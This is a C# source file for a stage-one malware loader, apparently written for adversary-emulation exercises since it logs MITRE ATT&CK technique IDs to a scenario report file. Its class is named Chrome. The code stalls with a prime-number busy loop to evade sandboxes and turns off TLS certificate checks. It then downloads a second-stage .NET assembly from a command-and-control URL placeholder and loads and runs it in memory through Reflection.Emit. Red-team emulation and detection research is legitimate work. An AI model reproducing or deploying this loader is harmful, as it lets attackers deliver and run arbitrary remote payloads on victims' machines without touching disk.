using System;
using System.IO;
using System.Text;
using System.Runtime.InteropServices;
using System.Net.Sockets;
using System.Security.Cryptography.X509Certificates;
using System.Net.Security;
using System.Diagnostics;
using System.Security.Authentication;
using System.Reflection;
using System.Reflection.Emit;

namespace Loader_net {

	class Chrome {

	static void Main(string[] args) {
	    Reporter.WriteLog("T1027.004", "1");
            delay(700000); //19-23 seconds
            Console.WriteLine("Empezando");
            byte[] dll = loadStage2();
            if (dll.Length == 0){
                return;
            }
            Reporter.WriteLog("T1105", "1");
            string[] assemblyArgs = new string[] { "" };
            object obj = new object();
            object[] objArr = new object[] { assemblyArgs };

            //Load and invoke the assembly
            DynamicMethod dynamicMethod = new DynamicMethod("_Invoke", typeof(void), new Type[] { typeof(byte[]), typeof(object), typeof(object[]) });
            ILGenerator iLGenerator = dynamicMethod.GetILGenerator();
            iLGenerator.Emit(OpCodes.Ldarg_0);
            iLGenerator.EmitCall(OpCodes.Call, typeof(Assembly).GetMethod("Load", new Type[] { typeof(byte[]) }), null);
            iLGenerator.EmitCall(OpCodes.Callvirt, typeof(Assembly).GetMethod("get_EntryPoint", new Type[] { }), null);
            iLGenerator.Emit(OpCodes.Ldarg_1);
            iLGenerator.Emit(OpCodes.Ldarg_2);
            iLGenerator.EmitCall(OpCodes.Callvirt, typeof(MethodBase).GetMethod("Invoke", new Type[] { typeof(object), typeof(object[]) }), null);
            iLGenerator.Emit(OpCodes.Pop);
            iLGenerator.Emit(OpCodes.Ret);
            dynamicMethod.Invoke(null, new object[] { dll, obj, objArr });
        }

        private static void delay(int n) {

            Stopwatch stopWatch = new Stopwatch();
            stopWatch.Start();
            FindPrimeNumber(n);
            stopWatch.Stop();
            TimeSpan ts = stopWatch.Elapsed;
            string elapsedTime = String.Format("{0:00}:{1:00}:{2:00}", ts.Minutes, ts.Seconds, ts.Milliseconds / 10);
        }

         private static byte[] loadStage2() {
         	System.Net.ServicePointManager.ServerCertificateValidationCallback = (senderX, certificate, chain, sslPolicyErrors) => { return true; };
         	string absoluteUrl = "C2_URL_PLACEHOLDER";
            try {
                using (var client = new System.Net.WebClient()) {
                    return client.DownloadData(absoluteUrl);
                }
            }
            catch {
                Reporter.WriteLog("T1105", "0");
                return new byte[] {};
            }
         	
        }

        public static void FindPrimeNumber(int n)
        {
            int count = 0;
            long a = 2;
            while (count < n)
            {
                long b = 2;
                int prime = 1;// to check if found a prime
                while (b * b <= a)
                {
                    if (a % b == 0)
                    {
                        prime = 0;
                        break;
                    }
                    b++;
                }
                if (prime > 0)
                {
                    count++;
                }
                a++;
            }
        }
	}

        static class Settings
    {
        public static string ID = "OCE-DW-04";
        public static bool DEBUG = bool.Parse("true");
        public static string ESCENARIO = "C2_PLACEHOLDER_ESCENARIO_ID";
        public static string CURRENT_PATH = "System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName";

        //public static string reportPath = Path.Combine(CURRENT_PATH.Substring(0,CURRENT_PATH.LastIndexOf("\\")+1), Settings.ESCENARIO + ".txt");

	public static string CommonDocsPath = Environment.GetFolderPath(Environment.SpecialFolder.CommonDocuments);
        public static string publicPath = Path.GetDirectoryName(CommonDocsPath);
        public static string reportPath = Path.Combine(publicPath, Settings.ESCENARIO + ".txt");
	
	
    }

    class Reporter
    {
        public static MemoryStream stream = new MemoryStream();
        public static StreamWriter writer = new StreamWriter(stream);

        public Reporter()
        {

        }

        public static void WriteLog(String id, String description)
        {
            if (id.Equals("0") && (!Settings.DEBUG))
                return;

            String message = String.Format("[{0}] [{1}] [{2}] [{3}]\n\r", DateTime.Now.ToString("dd/MM/yyyy HH:mm:ss"), Settings.ID, id, description);
            FileLog(message);
        }

        public static void FileLog(String description)
        {
            FileStream log = File.Open(Settings.reportPath, FileMode.Append);
            byte[] entryBytes = Encoding.UTF8.GetBytes(description);
            log.Write(entryBytes, 0, entryBytes.Length);
            log.Close();
            return;

        }
    }

}




